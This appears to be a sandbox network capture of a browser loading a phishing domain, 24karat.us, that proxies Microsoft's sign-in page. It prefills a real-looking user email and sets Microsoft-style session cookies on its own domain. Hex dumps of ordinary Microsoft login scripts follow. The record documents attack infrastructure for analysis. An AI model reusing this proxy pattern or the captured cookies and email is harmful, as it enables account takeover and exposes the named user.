                                      Referer: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00=
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4; ClientId=AD8DDA6D248F459D832803D0055B823B; OIDC=1; OpenIdConnect.nonce.v3.g427BzjQDBzf0BO-QNx0HwoLVfc2raPrjczMthckQqc=638467142511721442.75e664b3-455f-4a7a-b6ee-97291afcfdb8; X-OWA-RedirectHistory=ArLym14B4nsrvntK3Ag; esctx-lZyzPZZ7dso=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd85eCgDwL7M8YVfiTo-qIfO8StpvsLk0tqGoGFWefLdFyaafHaf7O_n8GPUbJCkB87Vi65bbl_yGNCRT2TFf8iuGD99QfWdfwTN6UEFGMUgIqrJqaS-tOc1s6BT-joOb3kURJuKMJLK3JyzXobixdYjiAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd828fF6I_XkBu9671vguo1Q-kUj_aaWavCZbbevWme2Iye5T7j5evWQA9m7zcoikJfzS2vlzmFf7HRVxoZwN2oO7hhr3V4eB-Y53a95UCEfmIL7cAmUFARrV8dZ_bC-AirXdhJ0AzcrEQHwh7utoz485kNe-KtFuVC1ODAc4cxDK8gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=0.AXgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8H7b1oBbQY25R6SkXdYFiwKR4ttfGBxLY18KiC2gtsetOJalgsuPnYMYk1ezNGDCk5fSzjgtSgmMC443JqOQh2RbqnkPE8nMmMvn6jrqFWMwgAA; esctx-gjXmeQLJekA=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8BDfVgdv8EX-JAd578OfrhVZ2W4dyehwTUSe_lxMXA6XYnt_wfxcJNAjdnRBN2IcTzvfk479nmwS1tuc9K5f47CfKec9aZ4oplLvgwgpesJ5ho3NCPE-bMGXwoeB_qwpESMCUB1ZEFZWa3reEcYUT4yAA; fpc=AnAxjE-_txJPjQb7YYiXMlWerOTJAQAAAI2Lj90OAAAA; cltm=CgAQABoAIgQIDBAF
                                      2024-03-22 14:24:15 UTC3151INHTTP/1.1 200 OK
                                      Cache-Control: no-store, no-cache
                                      Pragma: no-cache
                                      Content-Type: text/html; charset=utf-8
                                      Expires: Fri, 22 Mar 2024 14:23:15 GMT
                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                      Referrer-Policy: strict-origin-when-cross-origin
                                      x-ms-route-info: C514_BL2
                                      x-ms-request-id: 92e85b2f-5a6e-461a-9112-5f8329910f9b
                                      PPServer: PPV: 30 H: BL02EPF0001D84B V: 0
                                      Strict-Transport-Security: max-age=31536000
                                      Set-Cookie: MSPRequ=id=N&lt=1711117455&co=1; domain=24karat.us; Secure; path=/; SameSite=None; HttpOnly
                                      Set-Cookie: uaid=011b9c11b41cb6e82e7ac4e7f196eb40; domain=24karat.us; Secure; path=/; SameSite=None; HttpOnly
                                      Set-Cookie: cltm=; expires=Thu, 30-Oct-1980 16:00:00 GMT; domain=24karat.us; Secure; path=/; SameSite=None; HttpOnly
                                      Set-Cookie: MSCC=162.220.165.249-US; expires=Wed, 16-Apr-2025 14:24:15 GMT; domain=24karat.us; Secure; path=/; SameSite=None; HttpOnly
                                      Set-Cookie: MSPOK=$uuid-4e03cd4d-8c10-41c0-924d-c2ee5bfc6718; domain=24karat.us; Secure; path=/; SameSite=None; HttpOnly
                                      Set-Cookie: OParams=11O.Dulbf5riQig98yJKCwxAQBbiekTibGocC3phrTBvg9GVaa!vExA*KLje14j3XrlcP6DNEKZpxGOmDHapaYiThMVG*G6Xyv4taS95Qh!*Hgmv8XOSfAgHln8YNrxOtzr8ba2KiMC298JwXDY4hnS4zxS*pNuxXnEBF2AdD64Pk!IPUyLezbosVcrL2NxEYsiAuPxsrtQ1zFaRFsD9ymq0kyPStsUfm*wWMtxxPUd6QEPKzTxZmn3StvOJYyOBxN0Lan7NgMeX2jajZ!WnMTQecGD4Gtjxxr!76qElCtpbT0KK7tWfyOm!Ca1lqA!mYj53XannBjp7wX4RkF5TLLnEOZNaylQsSjX8ly5p8XENlclSxYr4iAM!Zg46!5!55XwN9G6OObaqp6qbF8OMVjn9cuO1UYa0Q9ODfNmarPwLCRNV9Bf9uUpI2ZNw0I5aNTXqltBGPdhXV45AFCRERq!OPx6YUTUASD2yjg50HmzP9E7qhAToMhzv1XicwVBvEfF*ktvdEUV*vQk6iBB04O1ZrEj4EwzUqgQuhW6yPvvSfD4yo!sw6QwbrQqZXGwn78ezp86BtqnkCV09rwrcAxkhKlFbZCHJveGE6Qsa9ASVCJoOoSubWcaLnu*3ol*eGuFjBSBpGcLJjLkjcMjor5T1dq!k!5ny3SzS!QgbtMUHQWh80Y2Iz9usRqzeteejg11g8M2ftaqolV7XBSPiDs2*1lkosqUFevzJEJ2LNwA1FbEiEhlbQN02rfH03Bm1u!LfMjVhvN8WpuvKnFuoEjGVbxHndvKHYcmLqf26DRor5CYQ5PenIHd9YDZLq9BLRy85I5HMbmu0nAKj7xgUncrKT4saNw3vgLQ*gr5pmWsdjPvP1Rf3pYCvXmNsKrGmACN5IaE4rZjhzIOD6Ed6*FuR7diDD!x39BNlo2PfgtmNcwrwcwGiSUNn*jmIOi7uywFIO56tmjeFNRAe4ghMo*FjVHwRSEB47FGqBZeKs25jMhSK55VVmqJpqZAKtijdFHHNIc4vn5y8ymPTmoIsMrZjlo0nT*vfP!Iba!05G*!jATGvyUh1YZ4p73RxcGH!zCae2cKongtFVV70rUB1!Zii!vnTRTppWdP6!9vBlWYVAyKSpamUyA8wbdseeGgcfWoiGlamsDtQ*16UO5AkTOVmsIUmW*zeh7*c0RcRqyBlFZJbDsliZbieM552*9gRnsojf7Q*ZRb0exh*osDHF4niGOCiPmFqZCG!CPIgis77Ma1GaEDyzIPbonJ0LOfRFahAfn8FHvdOfR2tjTlLXtVcmA*Jot4JXQcuTp0VMO3PdXkOTlTm0bNbahmKAP473lD3FKBnbry0jYtKq0un5ycoeRiXuEwoDGy03x!OB587TGGB; domain=24karat.us; Secure; path=/; SameSite=None; HttpOnly
                                      Date: Fri, 22 Mar 2024 14:24:14 GMT
                                      Connection: close
                                      content-length: 28752
                                      Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                      2024-03-22 14:24:15 UTC13233INData Raw: 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 53 65 72 76 65 72 49 6e 66 6f 3a 20 42 4c 30 32 45 50 46 30 30 30 31 44 38 34 42 20 32 30 32 34 2e 30 33 2e 31 34 2e 31 36 2e 30 39 2e 32 38 20 4c 6f 63 56 65 72 3a 30 20 2d 2d 3e 3c 21 2d 2d 20 50 72 65 70 72 6f 63 65 73 73 49 6e 66 6f 3a 20 43 42 41 2d 30 33 31 34 5f 31 35 35 37 32 37 3a 53 41 32 50 4e 50 46 30 30 30 30 32 32 37 34 2c 20 32 30 32 34 2d 30 33 2d 31 34 54 31 36 3a 30 36 3a 34 34 2e 37 39 31 30 36 37 35 2d 30 37 3a 30 30 20 2d 20 56 65 72 73 69 6f 6e 3a 20 31 36 2c 30 2c 33 30 31 34 31
                                      Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html>... ServerInfo: BL02EPF0001D84B 2024.03.14.16.09.28 LocVer:0 -->... PreprocessInfo: CBA-0314_155727:SA2PNPF00002274, 2024-03-14T16:06:44.7910675-07:00 - Version: 16,0,30141
                                      2024-03-22 14:24:15 UTC15519INData Raw: 6d 65 6f 75 74 3a 36 30 2c 69 41 75 74 6f 53 53 4f 53 74 61 74 65 3a 30 2c 73 50 72 65 66 69 6c 6c 55 73 65 72 6e 61 6d 65 3a 27 6a 67 6f 6c 40 62 67 63 6c 69 6e 69 63 2e 63 6f 6d 27 2c 66 45 6e 61 62 6c 65 43 6c 69 65 6e 74 54 65 6c 65 6d 65 74 72 79 3a 66 61 6c 73 65 2c 66 53 68 6f 77 55 70 64 61 74 65 64 4b 6f 72 65 61 6e 50 72 69 76 61 63 79 46 6f 6f 74 65 72 3a 74 72 75 65 2c 75 72 6c 46 65 64 53 69 67 6e 75 70 3a 27 27 2c 66 45 6e 61 62 6c 65 53 68 6f 77 50 69 63 6b 65 72 43 72 65 64 4f 62 73 65 72 76 61 62 6c 65 3a 66 61 6c 73 65 2c 75 72 6c 47 6f 54 6f 41 41 44 45 72 72 6f 72 3a 27 27 2c 66 46 69 78 55 49 43 72 61 73 68 46 6f 72 41 70 69 52 65 71 75 65 73 74 48 61 6e 64 6c 65 72 3a 66 61 6c 73 65 2c 66 44 6f 49 66 45 78 69 73 74 73 3a 66 61 6c 73
                                      Data Ascii: meout:60,iAutoSSOState:0,sPrefillUsername:'jgol@bgclinic.com',fEnableClientTelemetry:false,fShowUpdatedKoreanPrivacyFooter:true,urlFedSignup:'',fEnableShowPickerCredObservable:false,urlGoToAADError:'',fFixUICrashForApiRequestHandler:false,fDoIfExists:fals


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.449781192.229.211.1994433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:15 UTC562OUTGET /shared/5/js/login_en_4XWJLQsDnjOrefMiFTdF2g2.js HTTP/1.1
                                      Host: logincdn.msftauth.net
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://24karat.us/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:24:15 UTC770INHTTP/1.1 200 OK
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                      Age: 1164918
                                      Cache-Control: public, max-age=31536000
                                      Content-MD5: 7srD9gWJffEfz123CPvBLA==
                                      Content-Type: application/x-javascript
                                      Date: Fri, 22 Mar 2024 14:24:15 GMT
                                      Etag: 0x8DC3F503B562BED
                                      Last-Modified: Fri, 08 Mar 2024 09:15:00 GMT
                                      Server: ECAcc (nya/7982)
                                      Vary: Accept-Encoding
                                      X-Cache: HIT
                                      X-EC-BBR-Enable: 1
                                      x-ms-blob-type: BlockBlob
                                      x-ms-lease-status: unlocked
                                      x-ms-request-id: a1b88463-301e-00bc-0acc-71d87b000000
                                      x-ms-version: 2009-09-19
                                      Content-Length: 887551
                                      Connection: close
                                      2024-03-22 14:24:15 UTC16383INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6c 6f 67 69 6e 5f 65 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 6f 3d 7b 39 37 32 30 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 39 33 38 34 29 2c 6f 3d 7b 63 68 69 6c 64 43 6f 6e 74 65 78 74 54 79 70 65 73 3a 21 30 2c 63 6f 6e 74 65 78 74 54 79 70 65 3a 21 30 2c 63 6f 6e 74 65 78 74 54 79 70 65 73 3a 21 30 2c 64 65 66 61 75 6c 74 50 72 6f 70 73 3a 21 30 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 21 30 2c 67 65 74 44 65 66 61 75 6c 74 50 72 6f 70 73 3a 21 30 2c 67 65 74 44 65 72 69 76
                                      Data Ascii: /*! For license information please see login_en.js.LICENSE.txt */!function(){var e,t,n,r,o={97206:function(e,t,n){"use strict";var r=n(9384),o={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDeriv
                                      2024-03-22 14:24:15 UTC1INData Raw: 73
                                      Data Ascii: s
                                      2024-03-22 14:24:15 UTC16383INData Raw: 65 6c 65 63 74 65 64 3d 21 30 2c 76 6f 69 64 28 72 26 26 28 65 5b 6f 5d 2e 64 65 66 61 75 6c 74 53 65 6c 65 63 74 65 64 3d 21 30 29 29 3b 6e 75 6c 6c 21 3d 3d 74 7c 7c 65 5b 6f 5d 2e 64 69 73 61 62 6c 65 64 7c 7c 28 74 3d 65 5b 6f 5d 29 7d 6e 75 6c 6c 21 3d 3d 74 26 26 28 74 2e 73 65 6c 65 63 74 65 64 3d 21 30 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 69 66 28 6e 75 6c 6c 21 3d 74 2e 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 29 74 68 72 6f 77 20 45 72 72 6f 72 28 6c 28 39 31 29 29 3b 72 65 74 75 72 6e 20 69 28 7b 7d 2c 74 2c 7b 76 61 6c 75 65 3a 76 6f 69 64 20 30 2c 64 65 66 61 75 6c 74 56 61 6c 75 65 3a 76 6f 69 64 20 30 2c 63 68 69 6c 64 72 65 6e 3a 22 22 2b 65 2e 5f 77 72 61 70 70 65 72 53 74 61 74 65 2e 69
                                      Data Ascii: elected=!0,void(r&&(e[o].defaultSelected=!0));null!==t||e[o].disabled||(t=e[o])}null!==t&&(t.selected=!0)}}function Ie(e,t){if(null!=t.dangerouslySetInnerHTML)throw Error(l(91));return i({},t,{value:void 0,defaultValue:void 0,children:""+e._wrapperState.i
                                      2024-03-22 14:24:15 UTC16383INData Raw: 68 72 6f 77 20 45 72 72 6f 72 28 6c 28 33 33 29 29 7d 66 75 6e 63 74 69 6f 6e 20 52 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 6a 6e 5d 7c 7c 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 42 6e 28 65 29 7b 64 6f 7b 65 3d 65 2e 72 65 74 75 72 6e 7d 77 68 69 6c 65 28 65 26 26 35 21 3d 3d 65 2e 74 61 67 29 3b 72 65 74 75 72 6e 20 65 7c 7c 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 46 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 73 74 61 74 65 4e 6f 64 65 3b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 6f 3d 6d 28 6e 29 3b 69 66 28 21 6f 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6e 3d 6f 5b 74 5d 3b 65 3a 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 6f 6e 43 6c 69 63 6b 22 3a 63 61 73 65 22 6f 6e 43 6c 69 63 6b 43 61 70 74 75 72 65 22 3a 63 61 73
                                      Data Ascii: hrow Error(l(33))}function Rn(e){return e[jn]||null}function Bn(e){do{e=e.return}while(e&&5!==e.tag);return e||null}function Fn(e,t){var n=e.stateNode;if(!n)return null;var o=m(n);if(!o)return null;n=o[t];e:switch(t){case"onClick":case"onClickCapture":cas
                                      2024-03-22 14:24:15 UTC16383INData Raw: 6e 73 74 61 62 6c 65 5f 73 63 68 65 64 75 6c 65 43 61 6c 6c 62 61 63 6b 2c 45 6f 3d 61 2e 75 6e 73 74 61 62 6c 65 5f 63 61 6e 63 65 6c 43 61 6c 6c 62 61 63 6b 2c 6a 6f 3d 61 2e 75 6e 73 74 61 62 6c 65 5f 72 65 71 75 65 73 74 50 61 69 6e 74 2c 49 6f 3d 61 2e 75 6e 73 74 61 62 6c 65 5f 6e 6f 77 2c 4c 6f 3d 61 2e 75 6e 73 74 61 62 6c 65 5f 67 65 74 43 75 72 72 65 6e 74 50 72 69 6f 72 69 74 79 4c 65 76 65 6c 2c 44 6f 3d 61 2e 75 6e 73 74 61 62 6c 65 5f 49 6d 6d 65 64 69 61 74 65 50 72 69 6f 72 69 74 79 2c 4e 6f 3d 61 2e 75 6e 73 74 61 62 6c 65 5f 55 73 65 72 42 6c 6f 63 6b 69 6e 67 50 72 69 6f 72 69 74 79 2c 52 6f 3d 61 2e 75 6e 73 74 61 62 6c 65 5f 4e 6f 72 6d 61 6c 50 72 69 6f 72 69 74 79 2c 42 6f 3d 61 2e 75 6e 73 74 61 62 6c 65 5f 4c 6f 77 50 72 69 6f 72
                                      Data Ascii: nstable_scheduleCallback,Eo=a.unstable_cancelCallback,jo=a.unstable_requestPaint,Io=a.unstable_now,Lo=a.unstable_getCurrentPriorityLevel,Do=a.unstable_ImmediatePriority,No=a.unstable_UserBlockingPriority,Ro=a.unstable_NormalPriority,Bo=a.unstable_LowPrior
                                      2024-03-22 14:24:15 UTC3INData Raw: 72 20 6f
                                      Data Ascii: r o
                                      2024-03-22 14:24:15 UTC16383INData Raw: 3d 6e 61 28 29 3b 72 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 6e 75 6c 6c 3a 72 3b 76 61 72 20 69 3d 76 6f 69 64 20 30 3b 69 66 28 6e 75 6c 6c 21 3d 3d 4b 69 29 7b 76 61 72 20 61 3d 4b 69 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3b 69 66 28 69 3d 61 2e 64 65 73 74 72 6f 79 2c 6e 75 6c 6c 21 3d 3d 72 26 26 4a 69 28 72 2c 61 2e 64 65 70 73 29 29 72 65 74 75 72 6e 20 76 6f 69 64 20 6c 61 28 74 2c 6e 2c 69 2c 72 29 7d 71 69 2e 65 66 66 65 63 74 54 61 67 7c 3d 65 2c 6f 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3d 6c 61 28 31 7c 74 2c 6e 2c 69 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 64 61 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 63 61 28 35 31 36 2c 34 2c 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 66 61 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 75 61 28 35 31 36 2c 34 2c
                                      Data Ascii: =na();r=void 0===r?null:r;var i=void 0;if(null!==Ki){var a=Ki.memoizedState;if(i=a.destroy,null!==r&&Ji(r,a.deps))return void la(t,n,i,r)}qi.effectTag|=e,o.memoizedState=la(1|t,n,i,r)}function da(e,t){return ca(516,4,e,t)}function fa(e,t){return ua(516,4,
                                      2024-03-22 14:24:15 UTC16383INData Raw: 79 70 65 6f 66 20 63 2e 6f 6e 43 6c 69 63 6b 26 26 28 65 2e 6f 6e 63 6c 69 63 6b 3d 66 6e 29 7d 78 6e 28 6f 2c 72 29 26 26 28 74 2e 65 66 66 65 63 74 54 61 67 7c 3d 34 29 7d 6e 75 6c 6c 21 3d 3d 74 2e 72 65 66 26 26 28 74 2e 65 66 66 65 63 74 54 61 67 7c 3d 31 32 38 29 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 63 61 73 65 20 36 3a 69 66 28 65 26 26 6e 75 6c 6c 21 3d 74 2e 73 74 61 74 65 4e 6f 64 65 29 71 61 28 30 2c 74 2c 65 2e 6d 65 6d 6f 69 7a 65 64 50 72 6f 70 73 2c 72 29 3b 65 6c 73 65 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 72 26 26 6e 75 6c 6c 3d 3d 3d 74 2e 73 74 61 74 65 4e 6f 64 65 29 74 68 72 6f 77 20 45 72 72 6f 72 28 6c 28 31 36 36 29 29 3b 6e 3d 42 69 28 52 69 2e 63 75 72 72 65 6e 74 29 2c 42 69 28 44 69 2e 63 75 72 72 65
                                      Data Ascii: ypeof c.onClick&&(e.onclick=fn)}xn(o,r)&&(t.effectTag|=4)}null!==t.ref&&(t.effectTag|=128)}return null;case 6:if(e&&null!=t.stateNode)qa(0,t,e.memoizedProps,r);else{if("string"!=typeof r&&null===t.stateNode)throw Error(l(166));n=Bi(Ri.current),Bi(Di.curre
                                      2024-03-22 14:24:15 UTC2INData Raw: 29 74
                                      Data Ascii: )t
                                      2024-03-22 14:24:15 UTC16383INData Raw: 68 72 6f 77 20 45 72 72 6f 72 28 6c 28 33 32 37 29 29 3b 69 66 28 4f 73 28 29 2c 65 3d 3d 3d 44 6c 26 26 74 3d 3d 3d 52 6c 7c 7c 66 73 28 65 2c 74 29 2c 6e 75 6c 6c 21 3d 3d 4e 6c 29 7b 76 61 72 20 6e 3d 4c 6c 3b 4c 6c 7c 3d 41 6c 3b 66 6f 72 28 76 61 72 20 72 3d 67 73 28 29 3b 3b 29 74 72 79 7b 62 73 28 29 3b 62 72 65 61 6b 7d 63 61 74 63 68 28 6f 29 7b 70 73 28 65 2c 6f 29 7d 69 66 28 61 69 28 29 2c 4c 6c 3d 6e 2c 43 6c 2e 63 75 72 72 65 6e 74 3d 72 2c 31 3d 3d 3d 42 6c 29 74 68 72 6f 77 20 6e 3d 46 6c 2c 66 73 28 65 2c 74 29 2c 56 73 28 65 2c 74 29 2c 6c 73 28 65 29 2c 6e 3b 69 66 28 6e 75 6c 6c 21 3d 3d 4e 6c 29 74 68 72 6f 77 20 45 72 72 6f 72 28 6c 28 32 36 31 29 29 3b 65 2e 66 69 6e 69 73 68 65 64 57 6f 72 6b 3d 65 2e 63 75 72 72 65 6e 74 2e 61 6c
                                      Data Ascii: hrow Error(l(327));if(Os(),e===Dl&&t===Rl||fs(e,t),null!==Nl){var n=Ll;Ll|=Al;for(var r=gs();;)try{bs();break}catch(o){ps(e,o)}if(ai(),Ll=n,Cl.current=r,1===Bl)throw n=Fl,fs(e,t),Vs(e,t),ls(e),n;if(null!==Nl)throw Error(l(261));e.finishedWork=e.current.al


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.449783192.229.211.1994433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:16 UTC601OUTGET /shared/5/chunks/oneds-analytics-js_c53074e74ebeb8e140d6_en.js HTTP/1.1
                                      Host: logincdn.msftauth.net
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      Origin: https://24karat.us
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://24karat.us/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:24:16 UTC749INHTTP/1.1 200 OK
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                      Age: 3255350
                                      Cache-Control: public, max-age=31536000
                                      Content-MD5: s98wrnDDS6yV/JFUTZIJvQ==
                                      Content-Type: application/x-javascript
                                      Date: Fri, 22 Mar 2024 14:24:16 GMT
                                      Etag: 0x8DC2734BD782EB3
                                      Last-Modified: Tue, 06 Feb 2024 16:57:45 GMT
                                      Server: ECAcc (nya/7895)
                                      Vary: Accept-Encoding
                                      X-Cache: HIT
                                      x-ms-blob-type: BlockBlob
                                      x-ms-lease-status: unlocked
                                      x-ms-request-id: 8884d87b-e01e-00d1-28c9-5e4542000000
                                      x-ms-version: 2009-09-19
                                      Content-Length: 90613
                                      Connection: close
                                      2024-03-22 14:24:16 UTC16383INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6f 6e 65 64 73 2d 61 6e 61 6c 79 74 69 63 73 2d 6a 73 5f 63 35 33 30 37 34 65 37 34 65 62 65 62 38 65 31 34 30 64 36 5f 65 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 6d 73 69 64 65 6e 74 69 74 79 5f 73 69 73 75 5f 6d 73 61 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 6d 73 69 64 65 6e 74 69 74 79 5f 73 69 73 75 5f 6d 73 61 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 35 31 5d 2c 7b 34 31 36 39 36 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 74 2e 64 28 65 2c 7b 41 70 70 49 6e 73 69 67 68 74 73
                                      Data Ascii: /*! For license information please see oneds-analytics-js_c53074e74ebeb8e140d6_en.js.LICENSE.txt */"use strict";(self.webpackChunk_msidentity_sisu_msa=self.webpackChunk_msidentity_sisu_msa||[]).push([[251],{41696:function(n,e,t){t.r(e),t.d(e,{AppInsights
                                      2024-03-22 14:24:16 UTC16383INData Raw: 4d 54 53 74 72 69 6e 67 22 2c 61 74 3d 22 74 6f 55 54 43 53 74 72 69 6e 67 22 2c 75 74 3d 22 65 78 70 69 72 65 73 22 2c 63 74 3d 6e 75 6c 6c 2c 73 74 3d 6e 75 6c 6c 2c 6c 74 3d 6e 75 6c 6c 2c 66 74 3d 44 65 28 29 2c 64 74 3d 7b 7d 2c 76 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 70 74 28 6e 2c 65 29 7b 76 61 72 20 74 3d 6d 74 2e 5f 63 6b 4d 67 72 7c 7c 76 74 2e 5f 63 6b 4d 67 72 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 6d 74 2e 5f 63 6b 4d 67 72 3d 6d 74 28 6e 2c 65 29 2c 76 74 2e 5f 63 6b 4d 67 72 3d 74 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 6e 29 7b 72 65 74 75 72 6e 21 6e 7c 7c 6e 2e 69 73 45 6e 61 62 6c 65 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 6e 2c 65 29 7b 72 65 74 75 72 6e 21 21 28 65 26 26 6e 26 26 42 6e 28 6e 2e 69 67 6e 